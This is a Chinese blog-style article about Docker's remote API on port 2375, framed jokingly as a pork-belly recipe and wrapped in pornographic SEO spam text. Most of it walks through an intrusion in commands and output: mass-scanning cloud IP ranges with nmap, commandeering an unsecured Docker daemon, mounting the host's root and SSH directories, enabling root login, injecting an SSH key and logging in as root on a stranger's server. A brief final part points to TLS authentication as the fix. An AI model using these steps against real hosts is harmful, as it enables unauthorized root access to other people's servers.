校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 知識庫 > Docker暴露2375端口導致服務器被攻擊問題及解決方法

Docker暴露2375端口導致服務器被攻擊問題及解決方法

熱門標簽:地圖標注能更改嗎 廈門防封電銷電話卡 高德地圖標注公司需要錢 外呼系統全國 云南電商智能外呼系統哪家好 宜賓銷售外呼系統軟件 地圖標注員有發展前景嗎 濰坊寒亭400電話辦理多少錢 四川保險智能外呼系統

相信了解過docker remote API的同學對2375端口都不陌生了,2375是docker遠程操控的默認端口,通過這個端口可以直接對遠程的docker daemon進行操作。

當$HOST主機以docker daemon -H=0.0.0.0:2375方式啟動daemon時,可以在外部機器對$HOST的docker daemon進行直接操作:

docker -H tcp://$HOST:2375 ps

好,說說如何“入侵”,怎么通過這個端口入侵宿主機呢?

這個應該要從幾個點說起吧:
1. docker對user namespace沒有做隔離,也就是說,容器內部的root用戶就是宿主機的root用戶,一旦掛載目錄,就可以在容器內部以宿主機的root用戶身份對掛載的文件系統隨意修改了。

  • docker服務擁有很高的執行權利(相當于root),并且在docker用戶組下的普通用戶不需要任何其他驗證就可以執行docker run等命令。
  • 暴露的docker remote API端口如果沒有啟動ssl驗證的話,任何能連通到這臺docker宿主機的的機器都可以隨意操作這臺docker宿主機的docker daemon(docker run、docker ps、docker rm等等這些命令都不在話下)。

結合以上3點,就基本具備入侵docker宿主機的條件了

講得似乎有點懸,不多說,直接拿一個活鮮鮮的例子來講吧:

(請允許我用最近新學的一道菜將流程帶過 ╮( ̄▽ ̄)╭ )

秘制紅燒肉(docker版)

材料:一整塊一整塊的“5花”IP段,越肥越好(小白用戶越多越好)

配料:nmap,docker

step 1: 掃描2375端口

怎么掃?我選用的是簡單易用的黑客必備神器nmap了。

掃哪里呢?我選的目標是aliyun的IP段,百度得知:

42.96.128.0/17 Alibaba (Beijing) Technology Co., Ltd. China 
42.120.0.0/16 Aliyun Computing Co., LTD China 
42.121.0.0/16 Aliyun Computing Co., LTD China 
42.156.128.0/17 Aliyun Computing Co., LTD China 
110.75.0.0/16 Asia Pacific Network Information Centre China 
110.76.0.0/19 Ali Technology Co., Ltd China 
110.76.32.0/20 Aliyun Computing Co., LTD China 
110.173.192.0/20 HiChina Web Solutions (Beijing) Limited China 
110.173.208.0/20 HiChina Web Solutions (Beijing) Limited China 
112.124.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
112.127.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
114.215.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
115.28.0.0/16 HiChina Web Solutions (Beijing) Limited China 
115.29.0.0/16 HiChina Web Solutions (Beijing) Limited China 
115.124.16.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
115.124.20.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
115.124.24.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.38.208.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.38.216.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.42.224.0/20 Alibaba (China) Technology Co., Ltd. China 
119.42.242.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.42.244.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.0.16.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.0.24.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.0.28.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.196.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.197.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.198.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.199.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
140.205.0.0/16 Aliyun Computing Co., LTD China 
203.209.250.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 
218.244.128.0/19 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.4.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.5.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.5.5.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.6.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.6.6.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.7.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd.

我不生產IP,我只是百度的搬運工,別問我這些IP從那來,我也想知道~ >.<

將上面IP內容保存在一個文件中,如 aliyun.list

開始掃描:

cat aliyun.list| awk '{print $1}' | xargs -n 1 -I {} nmap -sT -p2375 {} --open 
# 簡單解釋一下命令:
# awk 將第一列IP網段過濾出來
# xargs 將過濾出來的IP一個一個的分次送給nmap,-I {} 是指使用{}來代替傳送的參數
# ...
# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST
# Nmap scan report for 42.96.MOSAIC.MOSAIC
# Host is up (0.070s latency).
# PORT STATE SERVICE
# 2375/tcp open docker
# ...

不到兩分鐘,第一塊42.96.MOSAIC.MOSAIC(五花肉已打碼) “五花肉”選好了,來吧~

step 2: 測試2375的直接控制權

docker -H tcp://42.96.MOSAIC.MOSAIC:2375 ps
 
# CONTAINER ID IMAGE    COMMAND   CREATED  STATUS  PORTS  
# 73aa690e7c92 imdjh/owncloud-with-ocdownloader "/entrypoint.sh"  9 days ago  Up 3 days  0.0.0.0:9009->80
# f57c56af0e29 rethinkdb:2.3.2   "rethinkdb --bind all" 9 days ago  Up 3 days  8080/tcp, 28015/
# 37c1401db593 gaomd/ikev2-vpn-server:0.3.0 "/bin/sh -c /usr/bin/" 10 days ago  Up 3 days  0.0.0.0:500->500
# af7338a5426d nginx:1.9-alpine   "nginx -g 'daemon off" 3 weeks ago  Up 3 days  443/tcp, 0.0.0.0
# ...

這個服務器的owner也太配合了(⊙ο⊙),ps直接看到內容,說明這個主機的2375是沒有ssl驗證的,基本滿足入侵要求。

“五花”洗好,切好,準備下鍋~

step 3: 遠程啟動自己的容器

拿到了docker的控制權能做什么呢?拿到了就呵呵了~

# images 看看本地已有的鏡像
# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 images
# ...
# swarm    latest  47dc182ea74b 4 weeks ago  19.32 MB
# jwilder/nginx-proxy  latest  203b20631e41 4 weeks ago  255.6 MB
# ubuntu    latest  c5f1cf30c96b 4 weeks ago  120.8 MB
# shipyard/shipyard   latest  ba426f0944bc 5 weeks ago  58.92 MB
# ...

省略了一部分輸出,鏡像還蠻多的,就選個ubuntu吧

# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

看到這步,相信對ssh有一些了解的同學應該就明白了

step 4: ssh pub key 注入

在剛剛啟動的容器中先看看 /tmp/ssh_etc/sshd_config (就是宿主機的/etc/ssh/sshd_config) 的PermitRootLogin字段。如果是no就改成yes,允許root通過ssh登錄

然后在你的機器上生成一對新的pub key(已經有ssh key的也建議生成一個新的,不要使用自己日常使用的ssh pub key)

# 使用 ssh-keygen生成
ssh-keygen -t rsa -C "hello@world.com"
# 執行命令后的提示Enter file in which to save the key要看好,不要把自己的ssh key覆蓋了,可以選著/tmp/id_rsa
# 其他提示enter到底即可

繼續,注入ssh pub key,回到剛剛啟動的容器執行

cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA.... # 這里粘貼你剛剛在自己機器生成的/tmp/id_rsa.pub
>EOF
 
# 如果/tmp/root/.ssh目錄不存在,就直接創建

八角香葉生抽老抽醋都加上,中火烹飪,準備出鍋~

step 5: 登入服務器

# ssh -i 指定秘鑰登錄
ssh -i /tmp/id_rsa root@42.96.MOSAIC.MOSAIC
 
# Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)
#
# * Documentation: https://help.ubuntu.com/
#
# Welcome to aliyun Elastic Compute Service!
#
# Last login: Fri Jun 3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC
# manpath: can't set the locale; make sure $LC_* and $LANG are correct
# root@iZ28p9b7e***:~# 
# ...

大火收汁,起鍋!

鄭重聲明

以上教程僅為交流學習之用,42.96.MOSAIC.MOSAIC 服務器上的id_rsa.pub在制作完本教程后已主動清除,并在服務上留言告知。

如果你一不小心也發現了可用的2375端口,希望也能點到即止,誤做他用,或者發現其他入侵漏洞,可以和大家交流學習。

2375是docker漏洞嗎?

非也!2375直接裸露地暴露在公網上純屬是用戶習慣或者偷懶的問題2375可以在相對安全的內部網絡中方便測試使用,并不適合使用在投入到生產環境中。

docker官網第一篇文檔quick start上有句話是這樣子的:

Warning: Changing the default docker daemon binding to a TCP port or
Unix docker user group will increase your security risks by allowing
non-root users to gain root access on the host. Make sure you control
access to docker. If you are binding to a TCP port, anyone with
access to that port has full Docker access; so it is not advisable
 on an open network.

已經Warning告知:如果將daemon直接暴露在一個TCP端口,將可能會被以非root用戶去獲取宿主機的root權限。其實上面的說提到的服務器之所以這么容器被入侵,也正是這個原因。

何以防之

那么,問題來了,如果想用Remote API,又不想有被入侵的風險,怎么辦呢?

docker官方文檔上介紹了一種通過CA認證方式使用Remote API

具體可以參考:Protect the Docker daemon socket

(等理解了再補一篇博客吧,就姑且讓我以一個鏈接的形式帶過吧O.O)

配置過程還算是比較簡單的,下面放一張圖,展示配置SSL后的效果:

到此這篇關于Docker暴露2375端口導致服務器被攻擊問題及解決方法的文章就介紹到這了,更多相關docker 暴露2375 端口內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

標簽:巴彥淖爾 紅河 廣安 廊坊 湛江 回訪 德州 滁州

巨人網絡通訊聲明:本文標題《Docker暴露2375端口導致服務器被攻擊問題及解決方法》,本文關鍵詞  Docker,暴露,2375,端口,導致,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Docker暴露2375端口導致服務器被攻擊問題及解決方法》相關的同類信息!
  • 本頁收集關于Docker暴露2375端口導致服務器被攻擊問題及解決方法的相關信息資訊供網民參考!
  • 推薦文章
    校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
    在线亚洲免费视频| 久久久久久一二三区| 欧美视频一区二区三区四区| 99久久国产免费看| 成人福利视频在线| zzijzzij亚洲日本少妇熟睡| 成人高清伦理免费影院在线观看| 成人午夜免费视频| 成人免费观看男女羞羞视频| caoporn国产精品| 91丨porny丨国产| 一本久道久久综合中文字幕 | 成人福利电影精品一区二区在线观看| 麻豆精品在线播放| 久久精品国产精品亚洲精品| 国产伦精品一区二区三区免费迷 | 欧美群妇大交群的观看方式| 91精品久久久久久久99蜜桃| 日韩欧美你懂的| 久久综合成人精品亚洲另类欧美| 精品国产乱子伦一区| 国产日产亚洲精品系列| 国产精品情趣视频| 一区二区三区免费看视频| 亚洲国产视频一区| 美女视频黄免费的久久| 国产精品自拍一区| 一本大道综合伊人精品热热| 欧美日韩精品三区| 精品日韩99亚洲| 国产精品日产欧美久久久久| 尤物在线观看一区| 老色鬼精品视频在线观看播放| 国产99精品视频| 91福利国产精品| 日韩精品在线一区二区| 国产精品九色蝌蚪自拍| 亚洲成人激情av| 国产真实乱偷精品视频免| 97aⅴ精品视频一二三区| 欧美影院精品一区| 欧美成人乱码一区二区三区| 中文幕一区二区三区久久蜜桃| 亚洲人成人一区二区在线观看| 丝袜亚洲另类欧美综合| 国产91丝袜在线播放九色| 91在线观看视频| 欧美一级理论片| 综合久久久久久| 老汉av免费一区二区三区| 99久久精品免费看国产| 日韩三级免费观看| 亚洲婷婷国产精品电影人久久| 一二三区精品福利视频| 国产一区三区三区| 欧美另类久久久品| 中文字幕免费在线观看视频一区| 婷婷六月综合亚洲| a在线播放不卡| 欧美精品一区二区三区蜜臀 | 国产成人久久精品77777最新版本| 色老综合老女人久久久| 久久嫩草精品久久久精品| 香蕉乱码成人久久天堂爱免费| 国产一区二区久久| 欧美电影影音先锋| 最新日韩在线视频| 国产一区啦啦啦在线观看| 欧美日韩第一区日日骚| 亚洲丝袜自拍清纯另类| 韩国毛片一区二区三区| 欧美久久婷婷综合色| 综合婷婷亚洲小说| 狠狠网亚洲精品| 欧美视频精品在线| 亚洲天堂精品在线观看| 国产91丝袜在线播放九色| 日韩视频不卡中文| 图片区小说区区亚洲影院| 色欧美日韩亚洲| 国产精品视频一二| 国产精品 日产精品 欧美精品| 欧美美女激情18p| 亚洲一区二区视频| 色伊人久久综合中文字幕| 国产欧美精品国产国产专区| 日本亚洲电影天堂| 欧美日韩精品电影| 亚洲一级二级在线| 色久综合一二码| 亚洲免费视频成人| 91老师片黄在线观看| 国产日产欧美一区二区三区| 国产一区二区三区久久悠悠色av| 日韩一区二区免费在线观看| 亚洲成av人片在线| 欧美精品一卡两卡| 日韩精品一二区| 欧美精选在线播放| 日韩电影一区二区三区四区| 欧美日韩精品综合在线| 亚洲国产aⅴ成人精品无吗| 91成人看片片| 亚洲影院免费观看| 欧美网站一区二区| 亚洲.国产.中文慕字在线| 欧美日韩精品免费| 青青草成人在线观看| 精品久久五月天| 国产精品自在在线| 中文字幕不卡的av| 91小视频在线| 亚洲成av人综合在线观看| 精品国产乱码久久久久久夜甘婷婷 | 成人理论电影网| 国产精品色眯眯| 91麻豆产精品久久久久久 | 99久久免费精品| 亚洲裸体在线观看| 欧美日韩在线精品一区二区三区激情 | 午夜精品免费在线观看| 91精品视频网| 国内精品国产成人| 欧美国产精品v| 91网站黄www| 午夜激情一区二区三区| 日韩免费福利电影在线观看| 国产成人在线视频网站| 亚洲色欲色欲www| 欧美色图天堂网| 久久99深爱久久99精品| 国产欧美日韩亚州综合| 91福利视频网站| 精品亚洲免费视频| 国产精品久久久久桃色tv| 欧美性猛交xxxxxx富婆| 加勒比av一区二区| 成人免费视频在线观看| 欧美日本一区二区三区| 国产精品综合视频| 一区二区三区在线免费播放| 91精品国产高清一区二区三区蜜臀| 国产专区综合网| 亚洲精品老司机| 日韩一级黄色大片| 成人美女视频在线看| 三级欧美韩日大片在线看| 久久久久青草大香线综合精品| 色婷婷久久久亚洲一区二区三区 | 国内精品嫩模私拍在线| 亚洲婷婷在线视频| 日韩你懂的在线播放| 99久久婷婷国产综合精品电影 | 不卡的av在线| 丝袜诱惑亚洲看片| 国产精品毛片久久久久久| 91麻豆精品91久久久久同性| 国产黄色91视频| 亚洲成人免费在线观看| 国产欧美日韩综合| 日韩欧美一二三四区| av电影在线不卡| 久久激情五月激情| 亚洲一区二区三区在线看 | 国产91丝袜在线播放| 日韩精品免费视频人成| 亚洲图片另类小说| 国产午夜亚洲精品羞羞网站| 欧美另类一区二区三区| 波多野结衣一区二区三区| 久久精品99久久久| 亚洲国产精品久久人人爱蜜臀 | 婷婷成人综合网| 国产精品久久看| 色综合久久综合网97色综合| 国产在线国偷精品免费看| 亚洲国产成人av好男人在线观看| 国产精品入口麻豆九色| 久久精品一区二区三区av| 欧美一区二区三区免费大片 | 日韩一区欧美一区| 国产香蕉久久精品综合网| xvideos.蜜桃一区二区| 91精品啪在线观看国产60岁| 日本久久精品电影| 成人精品视频一区| 国产成人精品免费一区二区| 麻豆精品视频在线观看免费| 丝袜美腿亚洲综合| 亚洲aⅴ怡春院| 夜夜嗨av一区二区三区网页| 国产精品乱码一区二区三区软件| 精品国产a毛片| 欧美一区二区三区免费| 欧美精品黑人性xxxx| 精品视频色一区| 欧美亚洲丝袜传媒另类| 91久久线看在观草草青青| 91麻豆蜜桃一区二区三区| av午夜一区麻豆|